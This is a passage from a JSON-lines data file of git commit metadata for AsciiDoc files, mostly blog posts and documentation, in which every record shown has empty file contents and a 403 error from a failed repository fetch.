tutorial.\n","repos":"miminar\/atomic-enterprise,projectatomic\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,miminar\/atomic-enterprise,markllama\/atomic-enterprise,projectatomic\/atomic-enterprise,miminar\/atomic-enterprise,marsmensch\/atomic-enterprise,miminar\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,miminar\/atomic-enterprise,markllama\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,marsmensch\/atomic-enterprise,marsmensch\/atomic-enterprise,marsmensch\/atomic-enterprise,projectatomic\/atomic-enterprise,marsmensch\/atomic-enterprise,markllama\/atomic-enterprise,miminar\/atomic-enterprise,markllama\/atomic-enterprise,projectatomic\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,projectatomic\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,marsmensch\/atomic-enterprise,projectatomic\/atomic-enterprise,markllama\/atomic-enterprise,markllama\/atomic-enterprise","old_file":"docs\/quick-start-tutorial.adoc","new_file":"docs\/quick-start-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/projectatomic\/atomic-enterprise.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d0a9343f754408330cc15e4a63d4c99bd6308c6","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19577433f7fc18f7fc8ddcc10261e78ab6b3eade","subject":"cheatsheet reference","message":"cheatsheet reference\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"CheatSheets.adoc","new_file":"CheatSheets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"8ca6fd9a75e460622f354fa36a5e1b260c3d2700","subject":"Update 2015-02-22-Blog-Title.adoc","message":"Update 2015-02-22-Blog-Title.adoc","repos":"hemantthakur\/hemantthakur.github.io,hemantthakur\/hemantthakur.github.io,hemantthakur\/hemantthakur.github.io","old_file":"_posts\/2015-02-22-Blog-Title.adoc","new_file":"_posts\/2015-02-22-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hemantthakur\/hemantthakur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d30643e7993565995e0166ff479b5665f87d926","subject":"Update 2015-08-25-Uberkonsum.adoc","message":"Update 2015-08-25-Uberkonsum.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"158fb5e8b0da9c41d035a0133bdac64e889f5612","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46d3c49ba0d05327a7a3675064b3af3f2fd2ce26","subject":"Update 2015-08-25-Uberkonsum.adoc","message":"Update 2015-08-25-Uberkonsum.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3a8712f9dfc66653dbffd666df34bb4ce9fb620","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5950f84cb457ed7b19b65e2041b137934608caf6","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53821e22e5fc2130993fefed3f6771577c5ad039","subject":"Serial","message":"Serial\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a92e309f45420187ad8f7466160d0c2c5a64557","subject":"Add list of 3rd party libraries","message":"Add list of 3rd party libraries\n","repos":"MSG134\/IVCT_Framework,MSG134\/IVCT_Framework,MSG134\/IVCT_Framework","old_file":"docs\/src\/7-3rdparty-libraries.adoc","new_file":"docs\/src\/7-3rdparty-libraries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MSG134\/IVCT_Framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ee5350220d95e747740f2843bce016ae30653cd","subject":"Don't use string directly as symbol name","message":"Don't use string directly as symbol name\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2b8e5c7d8af46bb59597b62d5b98b695d9599732","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87208dc87cc01278984602c6161da2edf4bba664","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"afe01113e23425bfc082854b61b4950d3c2afd22","subject":"Digital assets second pre-draft | Attempt to solve the firsts attack strategies","message":"Digital assets second pre-draft | Attempt to solve the firsts attack strategies\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/fermat_dap\/La construcci\u00f3n de un Digital Asset.asciidoc","new_file":"fermat-documentation\/fermat_dap\/La construcci\u00f3n de un Digital Asset.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b43bf0ef9b76db4d1a2af7f7e727379e49b93fc","subject":"Update 2015-05-06-Simplemente-Java.adoc","message":"Update 2015-05-06-Simplemente-Java.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-06-Simplemente-Java.adoc","new_file":"_posts\/2015-05-06-Simplemente-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Wurser\/wurser.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3b56eef518e6052c758b9eccacd4f57ef7834c8","subject":"Update 2015-09-27-Titel.adoc","message":"Update 2015-09-27-Titel.adoc","repos":"ice09\/ice09ng,ice09\/ice09ng,ice09\/ice09ng,ice09\/ice09ng","old_file":"_posts\/2015-09-27-Titel.adoc","new_file":"_posts\/2015-09-27-Titel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ice09\/ice09ng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9119f15667a2bc6ac6002f04d7a412fc679c1d15","subject":"Update 2015-12-23-Aurelia-orm-Getting-started.adoc","message":"Update 2015-12-23-Aurelia-orm-Getting-started.adoc","repos":"RWOverdijk\/rwoverdijk.github.io,RWOverdijk\/rwoverdijk.github.io,RWOverdijk\/rwoverdijk.github.io","old_file":"_posts\/2015-12-23-Aurelia-orm-Getting-started.adoc","new_file":"_posts\/2015-12-23-Aurelia-orm-Getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RWOverdijk\/rwoverdijk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21bdac62cb56b3c5e100ecd344cc227d593277c8","subject":"y2b create post Apogee Duet 2 Unboxing \\u0026 Overview","message":"y2b create post Apogee Duet 2 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-19-Apogee-Duet-2-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-05-19-Apogee-Duet-2-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adb0a76e78a0540e73dd4ea78f2287fd9e55cbdb","subject":"Added a readme","message":"Added a readme\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2bda52ceb2acb721b4682c8a8d8bc36c42e54478","subject":"Changed link to latest version of developer manual","message":"Changed link to latest version of developer manual\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a3381c88aed3be2671a2b20c7d00d80dcf3491e1","subject":"Update 2016-11-20-Eating-Vegan-at-a-Conference.adoc","message":"Update 2016-11-20-Eating-Vegan-at-a-Conference.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-11-20-Eating-Vegan-at-a-Conference.adoc","new_file":"_posts\/2016-11-20-Eating-Vegan-at-a-Conference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad3066ea0b3132938dc29e15da6649094b114b0e","subject":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e84401354ac0131896e7ed1c9e89601d1afcf72","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ffbaf415801c557b0aef4917edbb31a8ff6c629","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2be0125b918c28569f80ac19764ba3ff621fafe8","subject":"y2b create post Apple iPhone 5 Event Livestream!","message":"y2b create post Apple iPhone 5 Event Livestream!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-11-Apple-iPhone-5-Event-Livestream.adoc","new_file":"_posts\/2012-09-11-Apple-iPhone-5-Event-Livestream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc3ffddad7e0f9663c94b4e1640b598728a545bd","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13a91e936a78988773eea5d125078c5e4c299d90","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c28d88a1d95989017acd64a1ecf78e0bfd1334a4","subject":"add some documentation for attestation","message":"add some documentation for attestation\n","repos":"akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool","old_file":"doc\/Attestation.adoc","new_file":"doc\/Attestation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"dc1b295bdb97f66befdf325f20d45da2ee61a3f1","subject":"y2b create post Thank you.","message":"y2b create post Thank you.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-18-Thankyou.adoc","new_file":"_posts\/2018-02-18-Thankyou.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d133c008fd18edcf981024056756968fbc62171","subject":"add hasumi's blog \"git\u30b3\u30de\u30f3\u30c9\u8abf\u3079\u3066\u307f\u305f\"","message":"add hasumi's blog \"git\u30b3\u30de\u30f3\u30c9\u8abf\u3079\u3066\u307f\u305f\"","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-15-git-usecase-introduction.adoc","new_file":"_posts\/2017-10-15-git-usecase-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02e0509f1bdb2a7ec5e403f23fb5b04c0c910bd2","subject":"Update 2017-09-25-Number-5.adoc","message":"Update 2017-09-25-Number-5.adoc","repos":"koter84\/blog,koter84\/blog,koter84\/blog,koter84\/blog","old_file":"_posts\/2017-09-25-Number-5.adoc","new_file":"_posts\/2017-09-25-Number-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koter84\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6988d66d8e41b0628019301299f124f5b9e198e","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"274be9ea9e309d721ed68660c338cfa9cb1390d0","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3c75f5cde7cbabfa1785e79a491675a6f361cb8","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/04\/29\/deref.adoc","new_file":"content\/news\/2022\/04\/29\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8c9e8a8169645547d6f2428c3e94e6030bdc53a5","subject":"Move section on non-forking","message":"Move section on non-forking\n","repos":"thoni56\/cgreen,thoni56\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen","old_file":"doc\/cgreen-guide-en.asciidoc","new_file":"doc\/cgreen-guide-en.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thoni56\/cgreen.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"e66e32f331a5ed328a888e480b908b2890902c9c","subject":"Squashed commit of the following:","message":"Squashed commit of the following:\n\ncommit 0bd1766cf1234621bdaa4805d5dc42949433e151\nAuthor: Lillian Mahoney <lillian.lynn.mahoney@gmail.com>\nDate: Wed Jan 7 16:29:12 2015 -0600\n\n testing\n","repos":"brechin\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,brechin\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia","old_file":"latest-changes.asciidoc","new_file":"latest-changes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Applemann\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b33d38cba90016055902466ae6c87273ebf628df","subject":"added references","message":"added references\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e28d9a379c6a3db306962d81ac69943ac760e473","subject":"Add files","message":"Add files","repos":"jmunoz298\/Atlasti7,jmunoz298\/atlasti,jmunoz298\/atlasti,jmunoz298\/atlasti,jmunoz298\/Atlasti7,jmunoz298\/Atlasti7","old_file":"01-1-Caqdas.adoc","new_file":"01-1-Caqdas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmunoz298\/atlasti.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"63be2a536762e11ce64b4b2d6249b42d30ff36fd","subject":"Add versioning document","message":"Add versioning document\n","repos":"mpreisler\/openscap,mpreisler\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,mpreisler\/openscap,jan-cerny\/openscap,redhatrises\/openscap,redhatrises\/openscap,ybznek\/openscap,jan-cerny\/openscap,openprivacy\/openscap,mpreisler\/openscap,Hexadorsimal\/openscap,ybznek\/openscap,openprivacy\/openscap,mpreisler\/openscap,redhatrises\/openscap,OpenSCAP\/openscap,openprivacy\/openscap,Hexadorsimal\/openscap,redhatrises\/openscap,OpenSCAP\/openscap,openprivacy\/openscap,jan-cerny\/openscap,Hexadorsimal\/openscap,mpreisler\/openscap,ybznek\/openscap,Hexadorsimal\/openscap,ybznek\/openscap,jan-cerny\/openscap,jan-cerny\/openscap,Hexadorsimal\/openscap,OpenSCAP\/openscap,redhatrises\/openscap,Hexadorsimal\/openscap,jan-cerny\/openscap,ybznek\/openscap,openprivacy\/openscap,openprivacy\/openscap,OpenSCAP\/openscap,ybznek\/openscap,redhatrises\/openscap","old_file":"docs\/contribute\/versioning.adoc","new_file":"docs\/contribute\/versioning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jan-cerny\/openscap.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"f01ebbc23effa2452d17ed0df658af2e8eadd4ef","subject":"Update 2016-10-22-Using-TLS-12-with-Python-on-OS-X.adoc","message":"Update 2016-10-22-Using-TLS-12-with-Python-on-OS-X.adoc","repos":"olivierbellone\/olivierbellone.github.io,olivierbellone\/olivierbellone.github.io,olivierbellone\/olivierbellone.github.io,olivierbellone\/olivierbellone.github.io","old_file":"_posts\/2016-10-22-Using-TLS-12-with-Python-on-OS-X.adoc","new_file":"_posts\/2016-10-22-Using-TLS-12-with-Python-on-OS-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olivierbellone\/olivierbellone.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b34436885ceaf8fe305113a745f3cfc65f0ca408","subject":"y2b create post It Creates A Strange Sensation...","message":"y2b create post It Creates A Strange Sensation...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-11-It-Creates-A-Strange-Sensation.adoc","new_file":"_posts\/2017-05-11-It-Creates-A-Strange-Sensation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e083d33afa938f3671fe4df27f71291aa0c54488","subject":"Update 2017-03-15-Test-with-admonition-icons-2.adoc","message":"Update 2017-03-15-Test-with-admonition-icons-2.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2017-03-15-Test-with-admonition-icons-2.adoc","new_file":"_posts\/2017-03-15-Test-with-admonition-icons-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1066a6f8776e9bf66b7731b7e242d6ade75e3686","subject":"[DOCS] Add loopback to X-Pack install info (elastic\/x-pack-elasticsearch#2237)","message":"[DOCS] Add loopback to X-Pack install info (elastic\/x-pack-elasticsearch#2237)\n\nOriginal commit: elastic\/x-pack-elasticsearch@8c105818e2c53e76f02046ccd72ce13aeff904c7\n","repos":"gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elastics